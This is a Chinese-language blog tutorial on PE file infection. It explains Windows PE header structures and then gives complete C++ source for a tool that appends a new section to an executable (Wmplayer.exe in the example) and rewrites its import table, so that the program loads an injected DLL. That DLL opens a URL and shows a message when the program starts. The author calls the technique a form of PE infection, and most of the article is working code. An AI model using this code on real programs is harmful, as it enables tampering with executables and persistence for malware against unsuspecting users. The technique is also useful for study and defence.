劫持 PE 文件:新建节表并插入指定 DLL 文件

news2024/11/30 2:29:18

 PE格式简介

        PE(Portable Executable)格式,是微软Win32环境可移植可执行文件(如exe、dll、vxd、sys和vdm等)的标准文件格式。PE格式衍生于早期建立在VAX(R)VMS(R)上的COFF(Common Object File Format)文件格式。

        Portable 是指对于不同的Windows版本和不同的CPU类型上PE文件的格式是一样的,当然CPU不一样了,CPU指令的二进制编码是不一样的。只是文件中各种东西的布局是一样的。

        PE文件使用的是一个平面地址空间,所有代码和数据都合并在一起,组成一个很大的结构。主要有:

下面是一个简化的PE文件格式

简化PE文件格式

DOS MZ Header

PE Header

Section Table

Section 1

Section 2

...

Section n

Dos Mz head 和Dos stub和称Dos文件头,PE文件的第一个字节起始于MS-DOS头部,被称作IMAGE_DOS_HEADER.紧随Dos stub的是PE文件头(PE Header),PE Header是PE相关结构NT映像头(IMAGE_NT_HEADERS)的简称,其中包含许多PE装载器用到的重要字段。

1、入口点 Entry Point

2、文件偏移地址 File Offset

3、虚拟地址 Virtual Address 简称:VA

4、基地址 ImageBase

5、相对虚拟地址 Relative Virual Address 简称:RVA

公式: RVA (相对虚拟地址) =VA (虚拟地址) - ImageBase (基地址)

文件偏移地址和虚拟地址转换

在X86系统中,每个内存页的大小是4KB,即0X1000个字节。

文件偏移地址 File Offset = RVA (相对虚拟地址) 

文件偏移地址 File Offset = VA (虚拟地址) - ImageBase (基地址) 

  • PE具体结构图

pe格式的结构体定义可以在编译器的include文件夹里的winnt.h找到。

如下所示(经过简化的,具体的可以查看winnt.h,不同字长的结构,其实大体一样的)。

几个宏定义:

IMAGE_DOS_HEADER

typedef struct _IMAGE_DOS_HEADER

{

WORD e_magic; //魔术数字,所有MS-DOS兼容的可执行文件都将此值设为0X4D5A(MZ)

WORD e_cblp; //文件最后页的字节数

WORD e_cp; //文件页数

WORD e_crlc; //重定义元素个数

WORD e_cparhdr; //头部尺寸,以段落为单位

WORD e_minalloc; //所需的最小附加段

WORD e_maxalloc; //所需的最大附加段

WORD e_ss; //初始的SS值(相对偏移量)

WORD e_sp; //初始的SP值

WORD e_csum; //校验和

WORD e_ip; //初始的IP值

WORD e_cs; //初始的CS值(相对偏移量)

WORD e_lfarlc; //重分配表文件地址

WORD e_ovno; //覆盖号

WORD e_res[4]; //保留字

WORD e_oemid; //OEM标识符(相对e_oeminfo)

WORD e_oeminfo; //OEM信息

WORD e_res2[10]; //保留字

DWORD e_lfanew; //新exe头部的文件地址

}IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;

IMAGE_NT_HEADERS

#define IMAGE_NUMBEROF_DIRECTORY_ENTRIES 16

typedef struct IMAGE_NT_HEADERS

{

DWORD Signature;

IMAGE_FILE_HEADER FileHeader;

IMAGE_OPTIONAL_HEADER32 OptionalHeader;

}IMAGE_NT_HEADERS,*PIMAGE_NT_HEADERS;

typedef struct IMAGE_FILE_HEADER

{

WORD Machine;

WORD NumberOfSections;//节的数量

DWORD TimeDateStamp;

DWORD PointerToSymbols;

DWORD NumberOfSymbols;

WORD SizeOfOptionalHeader;

WORD Characteristics;

}IMAGE_FILE_HEADER,*PIMAGE_FILE_HEADER;

typedef struct IMAGE_OPTIONAL_HEADER32

{

WORD Magic;

BYTE MajorLinkerVersion;

BYTE MinorLinkerVersion;

DWORD SizeOfCode;

DWORD SizeOfInitializedData;

DWORD SizeOfUnInitializedData;

DWORD AddressOfEntryPoint;

DWORD BaseOfCode;

DWORD BaseOfData;

DWORD ImgaeBase;

DWORD SectionAlignment;

DWORD FileAlignment;

WORD MajorOperatingSystemVersion;

WORD MinorOperatingsystemversion;

WORD MajorImageVersion;

WORD MinorImageVersion;

WORD MajorSubsybtemVersion;

WORD MinorSubsybtemVersion;

DWORD Win32VersionValue;

DWORD SizeOfImage;

DWORD SizeoOfHeaders;

DWORD CheckSum;

WORD Subsystem;

WORD DllCharacteristics;

DWORD SizeOfStackReserve;

DWORD SizeOfStackCommit;

DWORD SizeOfHeapReserve;

DWORD SizeOfHeapCommit;

DWORD LoaderFlages;

DWORD NumberOfRvaAndSizes;

IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];

}IMAGE_OPTIONAL_HEADER32,*PIMAGE_OPTIONAL_HEADER32;

IMAGE_SECTION_HEADER

PE文件头后是节表,在winnt.h下如下定义

typedef struct _IMAGE_SECTION_HEADER

{

//IMAGE_SIZEOF_SHORT_NAME=8

BYTE Name[IMAGE_SIZEOF_SHORT_NAME];//节表名称,如".text"

union

{

DWORD PhysicalAddress;//物理地址

DWORD VirtualSize;//真实长度,这两个值是一个联合结构,可以使用其中的任何一个,//一般是节的数据大小

} Misc;

DWORD VirtualAddress;//RVA

DWORD SizeOfRawData;//物理长度

DWORD PointerToRawData;//节基于文件的偏移量

DWORD PointerToRelocations;//重定位的偏移

DWORD PointerToLinenumbers;//行号表的偏移

WORD NumberOfRelocations;//重定位项数目

WORD NumberOfLinenumbers;//行号表的数目

DWORD Characteristics;//节属性 如可读,可写,可执行等

} IMAGE_SECTION_HEADER, *PIMAGE_SECTION_HEADER;
typedef struct IMAGE_THUNK_DATA

{

union

{

DWORD ForwarderString;

DWORD Function;

DWORD Ordinal;

DWORD AddressOfData;

}u1;

}IMAGE_THUNK_DATA,*PIMAGE_THUNK_DATA;

typedef struct IMAGE_IMPORT_BY_NAME

{

WORD Hint;

BYTE Name;

}IMAGE_IMPORT_BY_NAME;

详细PE结构说明请查阅:

PE文件结构详解 --(完整版)icon-default.png?t=N7T8https://hupengcheng.blog.csdn.net/article/details/125847139?spm=1001.2101.3001.6650.5&utm_medium=distribute.pc_relevant.none-task-blog-2~default~BlogCommendFromBaidu~Rate-5-125847139-blog-92456577.235%5Ev40%5Epc_relevant_anti_t3_base&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2~default~BlogCommendFromBaidu~Rate-5-125847139-blog-92456577.235%5Ev40%5Epc_relevant_anti_t3_base&utm_relevant_index=10

 

  • 修改 PE 文件 IAT 注入

        通过以上的简单了解后,那么我们便进入正题。

        下面演示的这种方法其实是 PE 感染的一种,通过对目标程序添加一个新节并注入DLL,然后这会改变 PE 文件的大小,将原有的导入表复制到新节中,并添加自己的导入表描述符,最后将数据目录项中指向的导入表的入口指向新节。

        1、在目标 PE 文件中添加一个新节并映射 PE 文件,判断是否可以加一个新节,找到节的尾部,矫正偏移,对齐 RVA 填充新节 PIMAGE_SECTION_HEADER,修改IMAGE_NT_HEADERS,将新节添加到文件尾部。

        2、修改导入表:判断是否使用了绑定导入表,往新节中拷贝原导入表内容,继续构造新的导入表描述符 PIMAGE_IMPORT_DESCRIPTOR,构造IAT结构体 PIMAGE_THUNK_DATA,填充 PIMAGE_THUNK_DATA,将 PIMAGE_IMPORT_DESCRIPTOR 的 OriginalFirstThunk 和 FirstThunk 指向 PIMAGE_THUNK_DATA,name 指向 DllName,最后修改导入表的 VirtualAddress 指向新节。

IDT 结构:

        IDT 的描述在 IMAGE_OPTION_HEADER 里面的 IMPORT Table,通过 size 可以确定是否有足够的空间让我们添加。

        IDT 是由 IMAGE_IMPORT_DESCRIPTION (简称IID) 结构体组成的数组,数组末尾以NULL结构体结束。每个IID结构体为0x14字节所以这里IID区域为RVA。

废话不多……直接上代码。 

  • 现实代码 

 DLL:

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "stdafx.h"

extern "C"
{
	__declspec(dllexport) int Msg();
}

__declspec(dllexport) int Msg()
{
	system("start https://www.chwm.vip/?PEinject_v1.0");
	return 0;
}

DWORD WINAPI Thread(LPVOID LpParameter)
{
	char szPath[MAX_PATH] = { 0 };
	char szBuf[1024] = { 0 };
	GetModuleFileName(NULL, szPath, MAX_PATH);
	sprintf(szBuf, "DLL 已注入到进程\r\n%s\r\nProcessID\r\n%d\r\n", szPath, GetCurrentProcessId());
	MessageBox(NULL, szBuf, "DLL Inject", MB_OK);
	return 0;
}

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
					 )
{
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
		CreateThread(NULL, 0, Thread, NULL, 0, NULL);
        Msg();
		break;
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}

主程序:

// PEinject.cpp : 定义控制台应用程序的入口点。
//

#include "stdafx.h"
#include "PEinject.h"

#ifdef _DEBUG
#define new DEBUG_NEW
#endif

#define ERROR_MESSAGE(Msg) cout << Msg << endl;

 
// 唯一的应用程序对象

CWinApp theApp;

using namespace std;

 

BOOL    AddImportTable(const string& strTargetFile, const string& strInjectDllName, const string& strFunctionName);
BOOL    AddNewSection(const string& strTargetFile, ULONG ulNewSectionSize);
BOOL    AddNewImportDescriptor(const string& strTargetFile, const string& strInjectDllName, const string& strFunctionName);
DWORD   RVAToFOA(PIMAGE_NT_HEADERS pNtHeaders, DWORD dwRVA);
ULONG32 PEAlign(ULONG32 dwNumber, ULONG32 dwAlign);

 

BOOL AddImportTable(const string& strTargetFile, const string& strInjectDllName, const string& strFunctionName)
{
	BOOL bOk = false;
	try
	{
		bOk = AddNewSection(strTargetFile, 256);
		if (!bOk)
		{
			ERROR_MESSAGE("AddImportTable:AddNewSection failed.");
			return false;
		}

		bOk = AddNewImportDescriptor(strTargetFile, strInjectDllName, strFunctionName);
		if (!bOk)
		{
			ERROR_MESSAGE("AddImportTable:AddNewImportDescriptor failed.");
			return false;
		}
	}
	catch (exception* e)
	{
		ERROR_MESSAGE((string("AddImportTable:") + e->what()).c_str());
		return false;
	}

	return true;
}

BOOL AddNewSection(const string& strTargetFile, ULONG ulNewSectionSize)
{
	BOOL bOk = true;
	HANDLE TargetFileHandle = nullptr;
	HANDLE MappingHandle = nullptr;
	PVOID FileData = nullptr;

	try
	{
		// 打开文件
		TargetFileHandle = CreateFileA(strTargetFile.c_str(), GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
		if (TargetFileHandle == INVALID_HANDLE_VALUE)
		{
			ERROR_MESSAGE(string("AddNewSection:CreateFileA error with error code:" + GetLastError()).c_str());
			bOk = false;
			goto EXIT;
		}

		ULONG ulFileSize = GetFileSize(TargetFileHandle, NULL);

		// 映射文件
		MappingHandle = CreateFileMappingA(TargetFileHandle, NULL, PAGE_READWRITE, 0, ulFileSize, NULL);
		if (MappingHandle == NULL)
		{
			ERROR_MESSAGE(string("AddNewSection:CreateFileMapping error with error code:" + GetLastError()).c_str());
			bOk = false;
			goto EXIT;
		}

		// 得到缓存头
		FileData = MapViewOfFile(MappingHandle, FILE_MAP_ALL_ACCESS, 0, 0, ulFileSize);
		if (FileData == NULL)
		{
			ERROR_MESSAGE(string("AddNewSection:MapViewOfFile error with error code:" + GetLastError()).c_str());
			bOk = false;
			goto EXIT;
		}

		// 判断是否是PE文件
		if (((PIMAGE_DOS_HEADER)FileData)->e_magic != IMAGE_DOS_SIGNATURE)
		{
			ERROR_MESSAGE("AddNewSection:Target File is not a vaild file");
			bOk = false;
			goto EXIT;
		}

		PIMAGE_NT_HEADERS pNtHeaders = (PIMAGE_NT_HEADERS)((ULONG_PTR)FileData + ((PIMAGE_DOS_HEADER)FileData)->e_lfanew);
		if (pNtHeaders->Signature != IMAGE_NT_SIGNATURE)
		{
			ERROR_MESSAGE("AddNewSection:Target File is not a vaild file");
			bOk = false;
			goto EXIT;
		}

		// 判断是否可以增加一个新节
		if ((pNtHeaders->FileHeader.NumberOfSections + 1) * sizeof(IMAGE_SECTION_HEADER) > pNtHeaders->OptionalHeader.SizeOfHeaders/*三个部分的总大小*/)
		{
			ERROR_MESSAGE("AddNewSection:There is not enough space to add a new section.");
			bOk = false;
			goto EXIT;
		}

		// 得到新节的起始地址, 最后的起始地址
		PIMAGE_SECTION_HEADER pNewSectionHeader = (PIMAGE_SECTION_HEADER)(pNtHeaders + 1) + pNtHeaders->FileHeader.NumberOfSections;
		PIMAGE_SECTION_HEADER pLastSectionHeader = pNewSectionHeader - 1;

		// 对齐RVA和偏移
		DWORD FileSize = PEAlign(ulNewSectionSize, pNtHeaders->OptionalHeader.FileAlignment);
		DWORD FileOffset = PEAlign(pLastSectionHeader->PointerToRawData + pLastSectionHeader->SizeOfRawData, pNtHeaders->OptionalHeader.FileAlignment);
		DWORD VirtualSize = PEAlign(ulNewSectionSize, pNtHeaders->OptionalHeader.SectionAlignment);
		DWORD VirtualOffset = PEAlign(pLastSectionHeader->VirtualAddress + pLastSectionHeader->Misc.VirtualSize, pNtHeaders->OptionalHeader.SectionAlignment);

		// 填充新节表
		memcpy(pNewSectionHeader->Name, "00cfg", strlen("00cfg"));
		pNewSectionHeader->VirtualAddress = VirtualOffset;
		pNewSectionHeader->Misc.VirtualSize = VirtualSize;
		pNewSectionHeader->PointerToRawData = FileOffset;
		pNewSectionHeader->SizeOfRawData = FileSize;
		pNewSectionHeader->Characteristics = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE;

		// 修改IMAGE_NT_HEADERS
		pNtHeaders->FileHeader.NumberOfSections++;
		pNtHeaders->OptionalHeader.SizeOfImage += VirtualSize;
		pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].Size = 0;            // 关闭绑定导入
		pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].VirtualAddress = 0;

		// 添加新节到文件尾部
		SetFilePointer(TargetFileHandle, 0, 0, FILE_END);
		PCHAR pNewSectionContent = new CHAR[FileSize];
		RtlZeroMemory(pNewSectionContent, FileSize);
		DWORD dwWrittenLength = 0;
		bOk = WriteFile(TargetFileHandle, pNewSectionContent, FileSize, &dwWrittenLength, nullptr);
		if (bOk == false)
		{
			ERROR_MESSAGE(string("AddNewSection:WriteFile error with error code:" + GetLastError()).c_str());
			bOk = false;
			goto EXIT;
		}
	}
	catch (exception* e)
	{
		ERROR_MESSAGE((string("AddNewSection:") + e->what()).c_str());
		bOk = false;
	}
EXIT:
	if (TargetFileHandle != NULL)
	{
		CloseHandle(TargetFileHandle);
		TargetFileHandle = nullptr;
	}
	if (FileData != NULL)
	{
		UnmapViewOfFile(FileData);
		FileData = nullptr;
	}
	if (MappingHandle != NULL)
	{
		CloseHandle(MappingHandle);
		MappingHandle = nullptr;
	}

	return bOk;
}

ULONG32 PEAlign(ULONG32 dwNumber, ULONG32 dwAlign)
{
	return(((dwNumber + dwAlign - 1) / dwAlign) * dwAlign);        //  想 dwAlign 对齐,加上 dwAlign - 1,这样就可以保证对齐后的值 >= dwNumber
}

BOOL AddNewImportDescriptor(const string& strTargetFile, const string& strInjectDllName, const string& strFunctionName)
{
	bool bOk = true;
	HANDLE TargetFileHandle = nullptr;
	HANDLE MappingHandle = nullptr;
	PVOID FileData = nullptr;
	PIMAGE_IMPORT_DESCRIPTOR pImportTable = nullptr;

	try
	{
		// 打开文件
		TargetFileHandle = CreateFileA(strTargetFile.c_str(), GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
		if (TargetFileHandle == INVALID_HANDLE_VALUE)
		{
			ERROR_MESSAGE(string("AddNewImportDescriptor:CreateFileA error with error code:" + GetLastError()).c_str());
			bOk = false;
			goto EXIT;
		}

		ULONG ulFileSize = GetFileSize(TargetFileHandle, NULL);

		// 映射文件
		MappingHandle = CreateFileMappingA(TargetFileHandle, NULL, PAGE_READWRITE, 0, ulFileSize, NULL);
		if (MappingHandle == NULL)
		{
			cout << "AddNewImportDescriptor:CreateFileMapping error with error code:" << std::to_string(GetLastError()).c_str();
			bOk = false;
			goto EXIT;
		}

		// 得到缓存头
		FileData = MapViewOfFile(MappingHandle, FILE_MAP_ALL_ACCESS, 0, 0, ulFileSize);
		if (FileData == NULL)
		{
			ERROR_MESSAGE(string("AddNewImportDescriptor:MapViewOfFile error with error code:" + GetLastError()).c_str());
			bOk = false;
			goto EXIT;
		}

		// 判断是否是PE文件
		if (((PIMAGE_DOS_HEADER)FileData)->e_magic != IMAGE_DOS_SIGNATURE)
		{
			ERROR_MESSAGE("AddNewImportDescriptor:Target File is not a vaild file");
			bOk = false;
			goto EXIT;
		}

		PIMAGE_NT_HEADERS pNtHeaders = (PIMAGE_NT_HEADERS)((ULONG_PTR)FileData + ((PIMAGE_DOS_HEADER)FileData)->e_lfanew);
		if (pNtHeaders->Signature != IMAGE_NT_SIGNATURE)
		{
			ERROR_MESSAGE("AddNewImportDescriptor:Target File is not a vaild file");
			bOk = false;
			goto EXIT;
		}

		// 得到原导入表
		pImportTable = (PIMAGE_IMPORT_DESCRIPTOR)((ULONG_PTR)FileData + RVAToFOA(pNtHeaders, pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress));

		// 判断是否使用了绑定导入表
		bool bBoundImport = false;
		if (pImportTable->Characteristics == 0 && pImportTable->FirstThunk != 0)
		{
			// 桥一为0 桥二不是0 说明使用了绑定导入表
			bBoundImport = true;
			pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].Size = 0;    // 关闭绑定导入
			pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].VirtualAddress = 0;
		}

		// 找到自己添加的新节
		PIMAGE_SECTION_HEADER pNewSectionHeader = (PIMAGE_SECTION_HEADER)(pNtHeaders + 1) + pNtHeaders->FileHeader.NumberOfSections - 1;
		PBYTE pNewSectionData = pNewSectionHeader->PointerToRawData + (PBYTE)FileData;
		PBYTE pNewImportDescriptor = pNewSectionData;

		// 往新节中拷贝原导入表内容
		int i = 0;
		while (pImportTable->FirstThunk != 0 || pImportTable->Characteristics != 0)
		{
			memcpy(pNewSectionData + i * sizeof(IMAGE_IMPORT_DESCRIPTOR), pImportTable, sizeof(IMAGE_IMPORT_DESCRIPTOR));
			pImportTable++;
			pNewImportDescriptor += sizeof(IMAGE_IMPORT_DESCRIPTOR);
			i++;
		}

		// 复制最后一个描述符
		memcpy(pNewImportDescriptor, pNewImportDescriptor - sizeof(IMAGE_IMPORT_DESCRIPTOR), sizeof(IMAGE_IMPORT_DESCRIPTOR));

		// 计算修正值
		DWORD dwDelt = pNewSectionHeader->VirtualAddress - pNewSectionHeader->PointerToRawData;

		// pNewImportDescriptor 当前指向要构造的新描述符 再空出一个空描述符作为导入表的结束符 所以是 2 *
		PIMAGE_THUNK_DATA pNewThunkData = PIMAGE_THUNK_DATA(pNewImportDescriptor + 2 * sizeof(IMAGE_IMPORT_DESCRIPTOR));
		PBYTE pszDllName = (PBYTE)(pNewThunkData + 2);
		memcpy(pszDllName, strInjectDllName.c_str(), strInjectDllName.length());
		// 确定 DllName 的位置
		pszDllName[strInjectDllName.length() + 1] = 0;
		// 确定 IMAGE_IMPORT_BY_NAM 的位置
		PIMAGE_IMPORT_BY_NAME pImportByName = (PIMAGE_IMPORT_BY_NAME)(pszDllName + strInjectDllName.length() + 1);
		// 初始化 IMAGE_THUNK_DATA
		pNewThunkData->u1.Ordinal = (DWORD_PTR)pImportByName - (DWORD_PTR)FileData + /*加上修正值 - 这里应该填充在内存中的地址*/dwDelt;
		// 初始化 IMAGE_IMPORT_BY_NAME
		pImportByName->Hint = 1;
		memcpy(pImportByName->Name, strFunctionName.c_str(), strFunctionName.length());
		pImportByName->Name[strFunctionName.length() + 1] = 0;
		// 初始化 PIMAGE_IMPORT_DESCRIPTOR
		if (bBoundImport)
		{
			((PIMAGE_IMPORT_DESCRIPTOR)pNewImportDescriptor)->OriginalFirstThunk = 0;
		}
		else
		{
			((PIMAGE_IMPORT_DESCRIPTOR)pNewImportDescriptor)->OriginalFirstThunk = dwDelt + (DWORD_PTR)pNewThunkData - (DWORD_PTR)FileData;
		}
		((PIMAGE_IMPORT_DESCRIPTOR)pNewImportDescriptor)->FirstThunk = dwDelt + (DWORD_PTR)pNewThunkData - (DWORD_PTR)FileData;
		((PIMAGE_IMPORT_DESCRIPTOR)pNewImportDescriptor)->Name = dwDelt + (DWORD_PTR)pszDllName - (DWORD_PTR)FileData;
		// 修改导入表入口
		pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress = pNewSectionHeader->VirtualAddress;
		pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size = (i + 1) * sizeof(IMAGE_IMPORT_DESCRIPTOR);
	}
	catch (exception* e)
	{
		ERROR_MESSAGE((string("AddNewImportDescriptor:") + e->what()).c_str());
		bOk = false;
	}

EXIT:
	{
		if (TargetFileHandle != NULL)
		{
			CloseHandle(TargetFileHandle);
			TargetFileHandle = nullptr;
		}

		if (FileData != NULL)
		{
			UnmapViewOfFile(FileData);
			FileData = nullptr;
		}

		if (MappingHandle != NULL)
		{
			CloseHandle(MappingHandle);
			MappingHandle = nullptr;
		}
	}

	return bOk;
}

PIMAGE_SECTION_HEADER GetOwnerSection(PIMAGE_NT_HEADERS pNTHeaders, DWORD dwRVA)
{
	int i;
	PIMAGE_SECTION_HEADER pSectionHeader = (PIMAGE_SECTION_HEADER)(pNTHeaders + 1);
	for (i = 0; i < pNTHeaders->FileHeader.NumberOfSections; i++)
	{
		if ((dwRVA >= (pSectionHeader + i)->VirtualAddress) && (dwRVA <= ((pSectionHeader + i)->VirtualAddress + (pSectionHeader + i)->SizeOfRawData)))
		{
			return ((PIMAGE_SECTION_HEADER)(pSectionHeader + i));
		}
	}
	return PIMAGE_SECTION_HEADER(NULL);
}

DWORD RVAToFOA(PIMAGE_NT_HEADERS pNTHeaders, DWORD dwRVA)
{
	DWORD _offset;
	PIMAGE_SECTION_HEADER section;
	// 找到偏移所在节
	section = GetOwnerSection(pNTHeaders, dwRVA);
	if (section == NULL)
	{
		return(0);
	}
	// 修正偏移
	_offset = dwRVA + section->PointerToRawData - section->VirtualAddress;
	return(_offset);
}

int main(int argc, char *argv[])
{
	AddImportTable("Wmplayer.exe", "TestDLL.dll", "Msg");

    system("start https://www.chwm.vip/?PEinject_v1.0");

	system("pause");

	return 0;
}
  • 效果演示:

修改前

修改后

 

运行效果

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1348352.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

构建高效数据流转的 ETL 系统:数据库 + Serverless 函数计算的最佳实践

作者&#xff1a;柳下 概述 随着企业规模和数据量的增长&#xff0c;数据的价值越来越受到重视。数据的变化和更新变得更加频繁和复杂&#xff0c;因此及时捕获和处理这些变化变得至关重要。为了满足这一需求&#xff0c;数据库 CDC&#xff08;Change Data Capture&#xff…

深入解析 可空值类型

前言&#xff1a; 问&#xff1a;为什么会有可空值类型的诞生&#xff1f; 答&#xff1a;应对在某些特定场景中获取的信息可能是不完整的。 C# 1中的可空值类型 在C#1中没有对应的表示Null值的方法。当时普遍都是采用其他方式。第一种在数据缺失的情况下给其一个默认值。第…

论文阅读: AAAI 2022行人重识别方向论文-PFD_Net

本篇博客用于记录一篇行人重识别方向的论文所提出的优化方法《Pose-Guided Feature Disentangling for Occluded Person Re-identification Based on Transformer》&#xff0c;论文中提出的PDF_Net模型的backbone是采用《TransReID: Transformer-based Object Re-Identificati…

【JavaWeb学习笔记】17 - ThreadLocal

项目代码 https://github.com/yinhai1114/JavaWeb_LearningCode/tree/main/threadlocal/src/com/yinhai/thread 目录 项目代码 一、什么是ThreadLocal? 二、ThreadLocal快速入门 三、源码解读 一、什么是ThreadLocal? 1. ThreadLocal的作用&#xff0c;可以实现在同一个线…

打破成本壁垒,免费SSL证书为中小企业保驾护航

HTTPS&#xff0c;这个曾经看似遥远的技术词汇&#xff0c;如今已与我们每个人的网络生活息息相关。而实现HTTPS加密传输的关键一环——SSL证书&#xff0c;正以其独特的安全性能&#xff0c;为网站筑起一道坚实的防护墙。更令人惊喜的是&#xff0c;免费SSL证书服务已经到来&a…

SpringBoot+MyBatis+MySQL增删改查(一)(IDEA创建SpringBoot项目)

使用IDEA创建SpringBootMyBatisMySQL进行项目搭建 1.创建项目 文件 --> 新建 --> 项目 填写项目基本信息 项目名称、存放位置、项目语言、项目类型、JDK版本、打包 Web选项选择Spring Web SQL选项中勾选JDBC API、MyBatis Framework、MySQl Driver选项 至此一个空项目…

【深度学习:LSTM Networks】了解 LSTM 网络

【深度学习&#xff1a;LSTM Networks】了解 LSTM 网络 循环神经网络长期依赖问题 相关知识传送门&#xff1a; LSTM 网络LSTM 背后的核心理念LSTM 分步演练长短期记忆的变体Conclusion 循环神经网络 人类在思考时并不是每时每刻都从头开始。当你阅读这篇文章时&#xff0c;你…

单点登录的三种模式

介绍 单点登录存在的意义在于&#xff0c;比如公司里有多个系统&#xff0c;我只想登录一次&#xff0c;便可以访问公司的多个子系统 单点登录有很多模式&#xff0c;目前已知三种模式 1、cookie session模式 2、token模式 3、token refresh_token模式 Cookie Session模式…

基于OpenCv的车道检测

项目背景和步骤 车道检测是自动驾驶领域不可或缺的一环 具体步骤如下&#xff1a; 一、将图像灰度化&#xff0c;并进行适度的高斯滤波&#xff0c;剔除干扰 二、利用Canny边缘检测&#xff0c;检测出车道和其它物体的边缘 三、使用ROI区域截取&#xff0c;截取需要的部分&a…

1.1 FMEA目的

文章目录 1.1 目的和说明 潜在失效模式和影响分析&#xff08;FMEA&#xff09;是美国汽车工业行动集团&#xff08;AIAG&#xff09;和德国汽车工业联合会&#xff08;VDA&#xff09;的整车厂&#xff08;OEM&#xff09;和一级供应商成员合作逾三年的成果。FMEA手册已进行改…

看懂基本的电路原理图(入门)

文章目录 前言一、二极管二、电容三、接地一般符号四、晶体振荡器五、各种符号的含义六、查看原理图的顺序总结 前言 电子入门&#xff0c;怎么看原理图&#xff0c;各个图标都代表什么含义&#xff0c;今天好好来汇总一下。 就比如这个电路原理图来说&#xff0c;各个符号都…

10万蜜蜂同屏作战 UnityECS蜜蜂大战项目实践(附实现前后对比)

本文禁止转载 本项目是Unity官方推荐的ECS入门训练中的蜜蜂大战项目 知乎文章同步链接 浅谈ECS工作栈 提到ECS就不得不提JobSystem和Burst编译器&#xff0c;三者共同组成了Unity面向数据的DOTS&#xff08;Data-Oriented Technology Stack&#xff09;框架。 ECS&#xf…

Linux-------rm命令超详解(狠狠爱住)

目录 rm 命令用于在Linux系统中删除指定的文件或目录 基本语法&#xff1a; 常用选项&#xff1a; 示例用法&#xff1a; 放在文末的话&#xff1a; 补充&#xff1a; rm 命令用于在Linux系统中删除指定的文件或目录 基本语法&#xff1a; rm [选项] 文件名/目录名 常用…

Eclipse汉化

目录 一、首先电脑已经下载好Eclipse 二、打开Eclipse Babel 三、打开Eclipse 1、工具栏——>Help——> Install New Software 2、 点击Add 3、添加复制的链接&#xff0c;点击Add 4、等待加载 5、勾选Chinese&#xff08;Simpliied&#xff09;&#xff0c;而后Next&…

超市订单管理系统

比较简单的超市订单管理系统

在Google Colab中调用Gemini的API实现智能问答

一、引言 Google终于放出大招&#xff0c;在2023年12月6日正式推出规模最大、功能最强大的人工智能模型Gemini&#xff0c;对标ChatGPT&#xff0c;甚至有要赶超ChatGPT-4.0的节奏。 相比之前的Bard&#xff0c;Gemini的文本理解能力、图片识别能力和语义抽取能力大大增强&am…

HTML进阶

列表、表格、表单 文章目录 列表、表格、表单01-列表无序列表有序列表定义列表 02-表格表格结构标签-了解合并单元格 03-表单input 标签input 标签占位文本单选框上传文件多选框下拉菜单文本域label 标签按钮 04-语义化无语义的布局标签有语义的布局标签 05-字符实体 01-列表 …

SpringBoot之入门使用

系列文章目录 提示&#xff1a;这里可以添加系列文章的所有文章的目录&#xff0c;目录需要自己手动添加 SpringBoot之入门使用 提示&#xff1a;写完文章后&#xff0c;目录可以自动生成&#xff0c;如何生成可参考右边的帮助文档 文章目录 系列文章目录前言一、Spring缺点分析…

Springboot整合Elasticsearch 7.X 复杂查询

这里使用Springboot 2.7.12版本&#xff0c;Elasticsearch为7.15.0。 导入依赖 <dependency><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-data-elasticsearch</artifactId></dependency> yaml文件配置…

【AIGC-图片生成视频系列-4】DreamTuner:单张图像足以进行主题驱动生成

目录 一. 项目概述 问题&#xff1a; 解决&#xff1a; 二. 方法详解 a) 整体结构 b) 自主题注意力 三. 文本控制的动漫角色驱动图像生成的结果 四. 文本控制的自然图像驱动图像生成的结果 五. 姿势控制角色驱动图像生成的结果 2023年的最后一天&#xff0c;发个文记录…